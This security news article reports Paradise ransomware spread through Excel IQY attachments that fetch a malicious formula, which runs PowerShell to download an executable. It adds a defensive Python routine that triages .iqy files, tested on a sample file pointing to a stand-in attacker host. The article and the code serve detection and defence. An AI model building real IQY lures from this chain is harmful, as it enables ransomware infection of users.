Internet Query Files (IQY) were used to deliver a new variant of Paradise ransomware, as reported by Lastline. This file type had not been associated with this ransomware family before.
In the past, IQY files were typically used in other malware campaigns, such as the Necurs botnet distributing IQY files to deliver the FlawedAmmyy RAT. Bebloh and Ursnif also spread via IQY files and PowerShell.
IQY files are used by Microsoft Excel. They are text files containing a URL and the other parameters Excel needs to pull data from the internet. According to Lastline researchers, IQY may not be as well-known as other Microsoft Office file formats, but it can still be weaponized. The attack does not use any vulnerability in Microsoft Excel, so even fully patched systems are exposed to risk.
An IQY file can be used to download an Excel formula that abuses system processes such as PowerShell and CMD. It can also evade detection, since IQY is a legitimate Excel file type.
The ransomware is distributed through a spam campaign with IQY attachments. Once the attachment is opened, the file retrieves a malicious Excel formula from the threat actors’ command and control (C&C) server. The formula launches a PowerShell command, which in turn downloads an executable.
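As an added example (not code from the Lastline or Trend Micro write-ups), the following Python routine shows what a mail gateway or triage script can do with the attachment type described above: it parses the text of an .iqy file and flags a query URL that points outside the hosts an organization expects. The host allowlist and the sample file contents are constructed assumptions.

```python
"""Triage an Excel Internet Query (.iqy) attachment before it reaches a user.

An .iqy file is plain text: line 1 is the query type (WEB), line 2 the format
version (1), line 3 the URL Excel will fetch, followed by optional key=value
lines. Added example; the allowlist and sample below are constructed.
"""
from dataclasses import dataclass, field
from typing import FrozenSet, List, Optional, Tuple
from urllib.parse import urlparse


@dataclass
class IqyVerdict:
    is_web_query: bool
    url: Optional[str]
    host: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_iqy(text: str) -> Tuple[bool, Optional[str]]:
    """Return (is_web_query, url) for the raw text of an .iqy file."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return False, None
    return True, lines[2]


def triage_iqy(text: str, allowed_hosts: FrozenSet[str]) -> IqyVerdict:
    """Flag an IQY whose query URL is cleartext or points off the allowlist."""
    is_web, url = parse_iqy(text)
    if not is_web or url is None:
        return IqyVerdict(False, None, None, ["not a WEB query or no URL line"])
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower() or None
    reasons: List[str] = []
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {parsed.scheme!r}")
    elif parsed.scheme == "http":
        reasons.append("cleartext http URL")  # formula fetched without TLS
    if host is None:
        reasons.append("URL has no host")
    elif host not in allowed_hosts:
        reasons.append(f"host {host!r} not on allowlist")
    return IqyVerdict(True, url, host, reasons)


# Constructed sample resembling a spam attachment; the host is a placeholder.
SAMPLE_IQY = "WEB\n1\nhttp://attacker.invalid/formula.iqy\n\nSelection=EntirePage\n"
ALLOWED = frozenset({"reports.corp.example"})  # hypothetical internal data source
```

A gateway would quarantine any attachment for which `triage_iqy(...).suspicious` is true and log the extracted host for hunting.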
The researchers observed that the activity, which targets an organization in Asia, lasted for less than two days.
Shielding systems against ransomware
Ransomware has always been a prevalent threat that seems to only grow through the years. As reported in the Trend Micro 2019 Annual Security Roundup, detections of ransomware-related threats increased by over 6 million last year, from over 55 million in 2018 to over 61 million in 2019.
Ransomware’s success can be attributed to its constant evolution — threat actors continually develop ransomware features and leverage new file types to stealthily appear like non-malicious files and evade detection.
Enterprises and users can follow a few best practices to defend against ransomware. Since ransomware is usually distributed through malicious emails, employees should avoid downloading attachments and clicking on embedded links from unverified sources. Users should also perform regular backups of important files to minimize disruption in case of an infection.